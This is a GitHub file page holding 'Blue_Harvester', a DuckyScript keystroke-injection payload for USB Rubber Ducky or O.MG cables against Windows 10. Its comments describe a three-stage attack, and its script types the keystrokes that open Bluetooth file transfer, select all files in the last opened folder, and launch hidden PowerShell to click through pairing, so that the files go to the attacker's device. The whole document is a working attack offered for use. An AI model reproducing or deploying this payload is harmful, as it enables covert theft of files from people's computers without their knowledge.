-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathBlue_Harvester
134 lines (104 loc) · 2.3 KB
/
Blue_Harvester
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
REM Title: Blue_Harvester
REM Author: LulzAnarchyAnon
REM READ BELOW BEFORE EXECUTING PAYLOAD...
REM Description: This is a Three stage payload that begins by opening Bluetooth file transfer on the target device.
REM Next the attackers Bluetooth adapter name is selected for pairing. In the second stage the last folder opened
REM is selected followed by all of the files in the folder being selected, and added to the transfer cue.
REM The Third, and final stage authenticates, and allows pairing between the attacker, and the target device.
REM Afterwards the selected files are transferred to the attackers device via Bluetooth.
REM Depending on both devices certain variables will need to be adjusted in order for this payload to run correctly.
REM At the beginning of the Second stage "k" is used as it selects kali the (adapter name) I used as the attacker device.
REM NOTE: Make sure your device is Discoverable...
REM The cursor coordinates x,y on the screen may vary depending on device...
REM A Pairing request will pop up, hit CONFIRM... A Pairing accept will pop up, hit CONFIRM
REM I'm uncertain at the moment if this payload is more favorable for deployment on the OMG cables, or
REM USB Rubber Ducky (YOUR CHOICE)
REM Target: Windows 10
REM Props: Darren Kitchen and I am Jakoby
REM Version: 1.0
REM Category: Execution
REM STAGE 1
GUI
DELAY 50
STRING fsquirt
DELAY 200
ENTER
DELAY 500
SPACE
DELAY 500
REM STAGE 2
k
DELAY 500
ENTER
DELAY 500
SPACE
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
ENTER
DELAY 500
CTRL a
DELAY 500
ENTER
DELAY 500
TAB
DELAY 500
ENTER
REM STAGE 3
GUI
DELAY 50
STRING powershell -windowstyle hidden
DELAY 1000
ENTER
DELAY 5000
STRING Add-Type -AssemblyName System.Windows.Forms
DELAY 2000
ENTER
STRING $p1 = [System.Windows.Forms.Cursor]::Position.X = 1837
DELAY 2000
ENTER
STRING $p2 = [System.Windows.Forms.Cursor]::Position.Y = 1050
DELAY 2000
ENTER
DELAY 2000
STRING [System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point($p1, $p2)
DELAY 2000
ENTER
DELAY 500
MOUSE CLICK 1
DELAY 1000
ENTER
DELAY 1000
TAB
DELAY 1000
ENTER
DELAY 1000
ALT SPACE
DELAY 500
DOWNARROW
DELAY 500
DOWNARROW
DELAY 500
DOWNARROW
DELAY 500
DOWNARROW
DELAY 500
DOWNARROW
DELAY 500
DOWNARROW
DELAY 500
ENTER